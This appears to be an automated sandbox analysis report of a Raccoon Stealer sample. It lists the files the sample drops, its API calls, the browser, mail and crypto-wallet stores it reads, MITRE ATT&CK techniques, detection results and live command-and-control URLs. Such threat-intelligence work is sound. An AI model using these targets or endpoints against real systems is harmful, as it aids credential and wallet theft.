Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_00437819

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_0043EFDD

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

0_2_0042A2F9

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,

0_2_00433882

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h]	0_2_0045A03D
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h]	0_2_0045A081
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h]	0_2_0045A0B2

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,		0_2_0042C383
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,		0_2_00437819

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0043E03E

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

0_2_004371FA

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

0_2_0042A2F9

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,

0_2_0042C383

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aqlmlmmeey.exe PID: 5164, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;\|
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;\|
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: Jaxx;26;Jaxx;;cache*
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: ;26;exodus
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum Wallet

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aqlmlmmeey.exe PID: 5164, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection11	Obfuscated Files or Information2	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery26	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Aqlmlmmeey.exe	49%	Virustotal		Browse
Aqlmlmmeey.exe	40%	ReversingLabs	Win32.Trojan.Ulise
Aqlmlmmeey.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.Aqlmlmmeey.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139893		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://185.138.164.150:80//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aaegdcncolp	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae78	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://185.138.164.150/M	0%	Avira URL Cloud	safe
http://185.138.164.150:80/779676D92903688rome	0%	Avira URL Cloud	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae7w	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/	0%	Virustotal		Browse
http://185.138.164.150/	0%	Avira URL Cloud	safe
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.138.164.150/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98	true	Avira URL Cloud: safe	unknown
https://t.me/agrybirdsgamerept	false		high
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	RYwTiizs2t.0.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	RYwTiizs2t.0.dr	false		high
http://185.138.164.150:80//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aaegdcncolp	Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	false		high
https://repository.luxtrust.lu0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	false		high
http://www.mozilla.com0	qipcap.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	false		high
http://www.chambersign.org1	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.0.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae78	Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/0	nssckbi.dll.0.dr	false		high
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
